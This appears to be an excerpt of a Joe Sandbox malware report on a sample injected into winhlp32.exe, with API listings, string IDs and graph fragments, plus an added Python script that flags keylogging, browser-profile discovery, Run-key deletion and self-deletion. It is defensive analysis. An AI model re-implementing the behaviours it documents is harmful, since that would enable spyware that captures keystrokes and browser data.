                                    • Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                    • GetLastError.KERNEL32 ref: 00440D35
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide$ErrorLast
                                    • String ID:
                                    • API String ID: 1717984340-0
                                    • Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                    • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                                    • Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                    • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                    • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                    • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
                                    • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastRead
                                    • String ID:
                                    • API String ID: 4100373531-0
                                    • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                    • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                    • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                    • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

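                                    The function listings above print every constant argument as raw hex, so a few decodings are worth having at hand: GetKeyState(00000010) is VK_SHIFT, (00000011) is VK_CONTROL and (00000012) is VK_MENU (Alt); the RegOpenKeyExW call passes 80000002 (HKEY_LOCAL_MACHINE) and a samDesired of 00000002 (KEY_SET_VALUE), which is exactly the access needed for the RegDeleteValueW that follows it on the Policies\Explorer\Run key. The report also joins several strings of one function with "$" (for example "[AltL]$[AltR]"). The script below is an added example written for this page and is neither Joe Sandbox's code nor the sample's: it parses "APIs" and "String ID" lines in the report's own format, names those constants, and groups the observed API names and strings into the behaviours they support (keylogging, browser profile discovery, Policies\Explorer\Run cleanup, self-deletion). The sample lines are constructed from this report's listings; the behaviour table and its thresholds are the example's own assumptions, not something the report states.

```python
"""Triage helper for the "APIs" / "String ID" lines of a Joe Sandbox function listing.
Added example, not Joe Sandbox code: it parses those lines, names the raw hex
constants the report prints (virtual keys, registry hives, access masks) and
flags the behaviour groups the calls and strings support. The sample lines are
constructed from this report; the behaviour table and thresholds are assumptions."""
import re

API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
STRING_ID_LINE = re.compile(r"^\s*•?\s*String ID:\s*(?P<ids>.*\S)\s*$")

# Well-known Win32 values for the constants the report shows as raw hex.
VIRTUAL_KEYS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU"}
HKEYS = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}
REG_SAM = {0x2: "KEY_SET_VALUE", 0x20019: "KEY_READ", 0xF003F: "KEY_ALL_ACCESS"}

# Behaviour groups (this example's own table): APIs and strings the report
# attributes to the injected winhlp32 image, keyed by what they are used for.
BEHAVIOURS = {
    "keylogger": ({"GetKeyState", "GetKeyboardState", "GetKeyboardLayout",
                   "ToUnicodeEx", "GetForegroundWindow"},
                  {"[AltL]", "[AltR]", "[CtrlL]", "[CtrlR]"}),
    "browser_profile_discovery": ({"PathFileExistsW"},
                                  {"\\AppData\\Local\\Google\\Chrome\\",
                                   "\\AppData\\Local\\Microsoft\\Edge\\",
                                   "\\Opera Software\\Opera Stable\\"}),
    "policy_run_key_cleanup": ({"RegOpenKeyExW", "RegDeleteValueW"},
                               {"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\"}),
    "self_delete": ({"DeleteFileW", "RemoveDirectoryW"}, {"pth_unenc"}),
}


def parse_api_line(line):
    """Return {'api','module','args','ref','subcall'} for one APIs line, else None."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = m.group("args")
    return {"api": m.group("api"), "module": m.group("mod"),
            "args": args.split(",") if args else [],
            "ref": int(m.group("ref"), 16),
            "subcall": int(m.group("sub"), 16) if m.group("sub") else None}


def parse_string_ids(line):
    """Split a 'String ID:' line into its strings; the report joins several with '$'."""
    m = STRING_ID_LINE.match(line)
    return m.group("ids").split("$") if m else []


def _hex(arg):
    try:
        return int(arg, 16)
    except ValueError:  # '?' (unknown) or a symbolic argument such as pth_unenc
        return None


def decode_call(call):
    """Render one parsed call with its hex constants replaced by Win32 names."""
    api, args = call["api"], call["args"]
    if api == "GetKeyState" and args:
        vk = _hex(args[0])
        return f"GetKeyState({VIRTUAL_KEYS.get(vk, args[0])})"
    if api in ("RegOpenKeyExA", "RegOpenKeyExW") and len(args) >= 4:
        hive, sam = _hex(args[0]), _hex(args[3])
        return (f"{api}({HKEYS.get(hive, args[0])}, {args[1]}, "
                f"samDesired={REG_SAM.get(sam, args[3])})")
    return f"{api}({', '.join(args)})"


def classify(calls, strings):
    """Map behaviour name -> (matched APIs, matched strings) for the groups supported.

    A group needs at least two of its APIs (all of them if it lists fewer) and at
    least one of its strings; these thresholds are the example's own choice."""
    apis_seen = {c["api"] for c in calls}
    found = {}
    for name, (apis, needles) in BEHAVIOURS.items():
        api_hits = apis & apis_seen
        str_hits = {s for s in strings if any(n in s for n in needles)}
        if len(api_hits) >= min(2, len(apis)) and str_hits:
            found[name] = (sorted(api_hits), sorted(str_hits))
    return found


def triage(report_text):
    """Parse a chunk of report text and return (calls, strings, behaviours)."""
    calls, strings = [], []
    for line in report_text.splitlines():
        call = parse_api_line(line)
        if call:
            calls.append(call)
        else:
            strings.extend(parse_string_ids(line))
    return calls, strings, classify(calls, strings)


# Constructed sample: lines copied from this report's function listings.
SAMPLE_REPORT = r"""
• PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
• String ID: UserProfile$\AppData\Local\Microsoft\Edge\
• GetKeyState.USER32(00000011), ref: 0040B64B
  • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
  • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
• String ID: [AltL]$[AltR]
• RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D144,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A31
• RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A45
• String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
• DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
• RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
• String ID: pth_unenc
"""

if __name__ == "__main__":
    calls, strings, verdict = triage(SAMPLE_REPORT)
    for c in calls:
        print(f"{c['ref']:08x} {decode_call(c)}")
    for name, (apis, strs) in verdict.items():
        print(f"{name}: apis={apis} strings={strs}")
```

                                    Save the file as UTF-8 so the "•" bullets in the regexes match the report text, and feed it whole function blocks rather than single lines: the grouping only becomes meaningful when the APIs and the strings of one function are seen together, which is also why a lone DeleteFileW with no companion call is left unflagged.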
                                    Execution Graph

                                    Execution Coverage:1.2%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:0%
                                    Total number of Nodes:555
                                    Total number of Limit Nodes:10
                                    [Execution graph: the interactive graph (555 nodes, 10 limit nodes) was exported as a flat node/edge list and is not reproduced here. API nodes recoverable from that list, in the order reached from the CRT entry at 00434887: LoadLibraryA/GetModuleHandleA/GetProcAddress (0041cb50), GetModuleFileNameW (0040e9e1), FindResourceA/LoadResource/LockResource/SizeofResource (0041b4a8), CreateMutexA/GetLastError (0040d073), RegOpenKeyExA/RegQueryValueExA/RegCloseKey (00413549, 00407716, 004136f8, 004134ff), CreateProcessA/CloseHandle (00407755), RegOpenKeyExW/RegDeleteValueW (00413a23), StrToIntA (0040f0a1), seven CreateThread calls between 0040efc8 and 0040f26d, and a DeleteFileW/Sleep retry loop (0040f346, 0040f334). The remaining nodes are CRT start-up, heap (RtlAllocateHeap) and exception-handling routines.]
47831 445888 EnterCriticalSection 47811->47831 47814 4431b4 47812->47814 47814->47811 47843 44333a GetModuleHandleExW 47814->47843 47815 443266 47832 4432a6 47815->47832 47819 44323d 47822 443255 47819->47822 47852 4441f5 5 API calls _ValidateLocalCookies 47819->47852 47820 443283 47835 4432b5 47820->47835 47821 4432af 47854 457729 5 API calls _ValidateLocalCookies 47821->47854 47853 4441f5 5 API calls _ValidateLocalCookies 47822->47853 47823 4431c8 47823->47815 47823->47819 47851 443f50 20 API calls _Atexit 47823->47851 47831->47823 47855 4458d0 LeaveCriticalSection 47832->47855 47834 44327f 47834->47820 47834->47821 47856 448cc9 47835->47856 47838 4432e3 47841 44333a _Atexit 8 API calls 47838->47841 47839 4432c3 GetPEB 47839->47838 47840 4432d3 GetCurrentProcess TerminateProcess 47839->47840 47840->47838 47842 4432eb ExitProcess 47841->47842 47844 443364 GetProcAddress 47843->47844 47845 443387 47843->47845 47846 443379 47844->47846 47847 443396 47845->47847 47848 44338d FreeLibrary 47845->47848 47846->47845 47849 434fcb _ValidateLocalCookies 5 API calls 47847->47849 47848->47847 47850 4433a0 47849->47850 47850->47811 47851->47819 47852->47822 47853->47815 47855->47834 47857 448ce4 47856->47857 47858 448cee 47856->47858 47860 434fcb _ValidateLocalCookies 5 API calls 47857->47860 47862 4484ca 47858->47862 47861 4432bf 47860->47861 47861->47838 47861->47839 47863 4484f6 47862->47863 47864 4484fa 47862->47864 47863->47864 47868 44851a 47863->47868 47869 448566 47863->47869 47864->47857 47866 448526 GetProcAddress 47867 448536 __crt_fast_encode_pointer 47866->47867 47867->47864 47868->47864 47868->47866 47870 448587 LoadLibraryExW 47869->47870 47875 44857c 47869->47875 47871 4485a4 GetLastError 47870->47871 47872 4485bc 47870->47872 47871->47872 47873 4485af LoadLibraryExW 47871->47873 47874 4485d3 FreeLibrary 47872->47874 47872->47875 47873->47872 47874->47875 47875->47863 47876 404e26 WaitForSingleObject 47877 404e40 SetEvent FindCloseChangeNotification 
47876->47877 47878 404e57 closesocket 47876->47878 47879 404ed8 47877->47879 47880 404e64 47878->47880 47881 404e7a 47880->47881 47889 4050e4 83 API calls 47880->47889 47883 404e8c WaitForSingleObject 47881->47883 47884 404ece SetEvent CloseHandle 47881->47884 47890 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47883->47890 47884->47879 47886 404e9b SetEvent WaitForSingleObject 47891 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47886->47891 47888 404eb3 SetEvent CloseHandle CloseHandle 47888->47884 47889->47881 47890->47886 47891->47888 47892 40165e 47893 401666 47892->47893 47894 401669 47892->47894 47895 4016a8 47894->47895 47897 401696 47894->47897 47896 4344ea new 22 API calls 47895->47896 47899 40169c 47896->47899 47898 4344ea new 22 API calls 47897->47898 47898->47899

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 465 4432b5-4432c1 call 448cc9 468 4432e3-4432ef call 44333a ExitProcess 465->468 469 4432c3-4432d1 GetPEB 465->469 469->468 470 4432d3-4432dd GetCurrentProcess TerminateProcess 469->470 470->468
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG,00446136,00000003), ref: 004432D6
                                    • TerminateProcess.KERNEL32(00000000), ref: 004432DD
                                    • ExitProcess.KERNEL32 ref: 004432EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID: PkGNG
                                    • API String ID: 1703294689-263838557
                                    • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                    • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                    • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                    • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                    • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                    • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                    • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                    • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                    • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                    • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                    • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                    • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                                    • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                                    • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                                    • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                                    • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                                    • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                                    • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                                    • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                                    • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad$HandleModule
                                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                    • API String ID: 4236061018-3687161714
                                    • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                    • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                    • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                    • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 49 40eef2-40ef03 call 401fd8 23->49 69->70 101 40f34f-40f36a call 401fab call 4139a9 call 412475 69->101 80 40ec03 call 40d069 70->80 81 40ebcb-40ebea call 401fab call 413549 70->81 86 40ec08-40ec0a 80->86 81->80 97 40ebec-40ec02 call 401fab call 4139a9 81->97 89 40ec13-40ec1a 86->89 90 40ec0c-40ec0e 86->90 95 40ec1c 89->95 96 40ec1e-40ec2a call 41b2c3 89->96 94 40eef1 90->94 94->49 95->96 103 40ec33-40ec37 96->103 104 40ec2c-40ec2e 96->104 97->80 126 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 101->126 107 40ec76-40ec89 call 401e65 call 401fab 103->107 108 40ec39-40ec40 call 407716 103->108 104->103 127 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 107->127 128 40ec8b call 407755 107->128 120 40ec42-40ec47 call 407738 call 407260 108->120 121 40ec4c-40ec5f call 401e65 call 401fab 108->121 120->121 121->107 140 40ec61-40ec67 121->140 157 40f3a5-40f3af call 40dd42 call 414f2a 126->157 177 40ed80-40ed84 127->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 127->178 128->127 140->107 143 40ec69-40ec6f 140->143 143->107 147 40ec71 call 407260 143->147 147->107 180 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->180 181 40ed8a-40ed91 177->181 178->177 205 40ed35-40ed39 call 401e65 178->205 236 40ef6b-40efbf 
call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 180->236 184 40ed93-40ee0d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 181->184 185 40ee0f-40ee19 call 409057 181->185 191 40ee1e-40ee42 call 40247c call 434798 184->191 185->191 212 40ee51 191->212 213 40ee44-40ee4f call 436e90 191->213 214 40ed3e-40ed7b call 401fab call 401e65 call 401fab call 40da34 call 401f13 call 401f09 205->214 218 40ee53-40eec8 call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 call 4347a1 call 401e65 call 40b9bd 212->218 213->218 214->177 218->236 286 40eece-40eeed call 401e65 call 41bc5e call 40f474 218->286 287 40efc1 236->287 288 40efdc-40efde 236->288 286->236 306 40eeef 286->306 292 40efc3-40efda call 41cd9b CreateThread 287->292 289 40efe0-40efe2 288->289 290 40efe4 288->290 289->292 293 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 290->293 292->293 344 40f101 293->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 293->345 306->94 347 40f103-40f11b call 401e65 call 401fab 344->347 345->347 357 40f159-40f16c call 401e65 call 401fab 347->357 358 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 347->358 368 40f1cc-40f1df call 401e65 call 401fab 357->368 369 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 357->369 358->357 379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 368->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 368->380 369->368 379->380 402 40f240 380->402 403 40f243-40f256 CreateThread 380->403 402->403 404 40f264-40f26b 403->404 405 
40f258-40f262 CreateThread 403->405 408 40f279-40f280 404->408 409 40f26d-40f277 CreateThread 404->409 405->404 412 40f282-40f285 408->412 413 40f28e 408->413 409->408 415 40f287-40f28c 412->415 416 40f2cc-40f2e7 call 401fab call 4134ff 412->416 418 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 413->418 415->418 416->157 427 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 416->427 418->416 443 40f346-40f34b DeleteFileW 427->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->126 445->126 446 40f334-40f341 Sleep call 401f04 445->446 446->443
                                    APIs
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\winhlp32.exe,00000104), ref: 0040E9EE
                                      • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
